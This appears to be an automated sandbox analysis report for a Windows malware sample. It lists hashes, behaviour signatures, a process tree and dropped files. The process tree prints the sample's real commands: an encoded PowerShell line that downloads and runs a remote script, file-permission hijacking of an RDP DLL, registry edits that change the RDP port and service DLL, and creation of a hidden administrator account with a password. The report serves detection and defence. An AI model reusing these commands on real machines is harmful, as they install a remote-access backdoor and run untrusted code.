Analysis
-
max time kernel
136s -
max time network
129s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
12-11-2020 14:16
General
-
Target
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
-
Size
3.4MB
-
MD5
a8d7894060ed9e3a80de995fcbf81864
-
SHA1
8ed59a83db92328d05ec05af58f2b4e259be3af4
-
SHA256
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98
-
SHA512
5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 41 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 127 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmp" "c:\Users\Admin\AppData\Local\Temp\5agdcg2t\CSC977694CB725A4BBD99B4E7E5B7F754.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin dm9djaMi /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin dm9djaMi /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin dm9djaMi /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin dm9djaMi1⤵
-
C:\Windows\system32\net.exenet.exe user updwin dm9djaMi2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin dm9djaMi3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.dllMD5
1c24fccd700bf0fc9d10819d2db40625
SHA1dc0142adf0d2dfd4838d2255ebd592c8d901be77
SHA256de03d70f8ef51e10f184b3114461724bbc6cfb697f91da7172230748265f18db
SHA512f3715bd41ed1fa264019ee77ec6ac7e788605fe486a5e33ffeb739dd023fd918febcfdaccc36d4c5fab08f4d414babdec17def5741599767ed281bbe1adeef33
-
C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmpMD5
8c582b2501b04000211837d30077873c
SHA1504c7866540324ef4082d3683d74d8382d2d1d58
SHA256e4a3f446d8d3fd93aa1d10665eca56cb37ef209eaf7efa8d568e10ba86cdd505
SHA512b0720dbbdbdfdae22c346f639a46b007dfc80601e78ca1f192f667504288c650bc62cd059783d42fd6199692e790ce29a18df54a89ec64ced3f245459f3d7e9b
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.cmdlineMD5
4d2c717f8c9dccae1c012d980eadb085
SHA15abb054fbc72e676a526ab1267a33fa27c641230
SHA256ae2b113ac0918d747f22646c5f335ee9e6a0e8b6a20e597468b2e4d273d8d52c
SHA5120f1d20220be9b73983be5cd0ee06aea8999c4df4d25b8ead93dfd4cce943810374be84e953df119c099bb5bf0aac8b519d7e3d73c7230f872e1bdff91e101ea7
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\CSC977694CB725A4BBD99B4E7E5B7F754.TMPMD5
17b80d4f73f621ff391dbfb359113ffd
SHA10fe86a6eb89c2eef3031388bca5e66a2128e042d
SHA25610f51f3ae842f8437484b052da6f0538769e373005fb75a0e18b3de380e40a17
SHA512043c7d0cee270e3b06299d3081aa78f578785d472a00552750e1ba2e41733285e8fe3b19c597203113d3677d390415aa5162c693df60dccb4f623b80a6379a57
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/268-10-0x0000000000000000-mapping.dmp
-
memory/268-55-0x0000000000000000-mapping.dmp
-
memory/308-1-0x0000000001480000-0x0000000001491000-memory.dmpFilesize
68KB
-
memory/308-0-0x0000000001140000-0x000000000147D000-memory.dmpFilesize
3.2MB
-
memory/432-38-0x0000000000000000-mapping.dmp
-
memory/688-61-0x0000000000000000-mapping.dmp
-
memory/688-85-0x0000000000000000-mapping.dmp
-
memory/760-45-0x0000000000000000-mapping.dmp
-
memory/796-62-0x0000000000000000-mapping.dmp
-
memory/912-72-0x0000000000000000-mapping.dmp
-
memory/912-60-0x0000000000000000-mapping.dmp
-
memory/916-67-0x0000000000000000-mapping.dmp
-
memory/920-66-0x0000000000000000-mapping.dmp
-
memory/944-49-0x0000000000000000-mapping.dmp
-
memory/948-95-0x00000000196A0000-0x00000000196A1000-memory.dmpFilesize
4KB
-
memory/948-97-0x00000000196D0000-0x00000000196D1000-memory.dmpFilesize
4KB
-
memory/948-78-0x000007FEF4EF0000-0x000007FEF58DC000-memory.dmpFilesize
9.9MB
-
memory/948-113-0x000000001AD90000-0x000000001AD91000-memory.dmpFilesize
4KB
-
memory/948-96-0x00000000196C0000-0x00000000196C1000-memory.dmpFilesize
4KB
-
memory/948-104-0x000000001A010000-0x000000001A011000-memory.dmpFilesize
4KB
-
memory/948-112-0x000000001AD70000-0x000000001AD71000-memory.dmpFilesize
4KB
-
memory/948-88-0x0000000000FE0000-0x0000000000FE1000-memory.dmpFilesize
4KB
-
memory/948-94-0x0000000019690000-0x0000000019691000-memory.dmpFilesize
4KB
-
memory/948-93-0x0000000001030000-0x0000000001031000-memory.dmpFilesize
4KB
-
memory/948-105-0x000000001ACE0000-0x000000001ACE1000-memory.dmpFilesize
4KB
-
memory/948-77-0x0000000000000000-mapping.dmp
-
memory/956-48-0x0000000000000000-mapping.dmp
-
memory/1008-83-0x0000000000000000-mapping.dmp
-
memory/1060-64-0x0000000000000000-mapping.dmp
-
memory/1060-43-0x0000000000000000-mapping.dmp
-
memory/1068-46-0x0000000000000000-mapping.dmp
-
memory/1072-69-0x0000000000000000-mapping.dmp
-
memory/1080-51-0x0000000000000000-mapping.dmp
-
memory/1164-13-0x0000000000000000-mapping.dmp
-
memory/1164-54-0x0000000000000000-mapping.dmp
-
memory/1224-65-0x0000000000000000-mapping.dmp
-
memory/1248-47-0x0000000000000000-mapping.dmp
-
memory/1292-44-0x0000000000000000-mapping.dmp
-
memory/1340-21-0x000000001C210000-0x000000001C211000-memory.dmpFilesize
4KB
-
memory/1340-6-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/1340-2-0x0000000000000000-mapping.dmp
-
memory/1340-35-0x000000001C250000-0x000000001C251000-memory.dmpFilesize
4KB
-
memory/1340-3-0x000007FEF4EF0000-0x000007FEF58DC000-memory.dmpFilesize
9.9MB
-
memory/1340-4-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
memory/1340-5-0x000000001ABC0000-0x000000001ABC1000-memory.dmpFilesize
4KB
-
memory/1340-34-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1340-7-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/1340-9-0x000000001B6C0000-0x000000001B6C1000-memory.dmpFilesize
4KB
-
memory/1340-17-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/1340-18-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/1340-33-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/1416-76-0x0000000000000000-mapping.dmp
-
memory/1420-36-0x0000000000000000-mapping.dmp
-
memory/1464-56-0x0000000000000000-mapping.dmp
-
memory/1540-39-0x0000000000000000-mapping.dmp
-
memory/1580-63-0x0000000000000000-mapping.dmp
-
memory/1580-40-0x0000000000000000-mapping.dmp
-
memory/1580-74-0x0000000000000000-mapping.dmp
-
memory/1624-57-0x0000000000000000-mapping.dmp
-
memory/1644-41-0x0000000000000000-mapping.dmp
-
memory/1648-52-0x0000000000000000-mapping.dmp
-
memory/1656-70-0x0000000000000000-mapping.dmp
-
memory/1656-50-0x0000000000000000-mapping.dmp
-
memory/1688-75-0x0000000000000000-mapping.dmp
-
memory/1688-42-0x0000000000000000-mapping.dmp
-
memory/1840-73-0x0000000000000000-mapping.dmp
-
memory/1936-53-0x0000000000000000-mapping.dmp
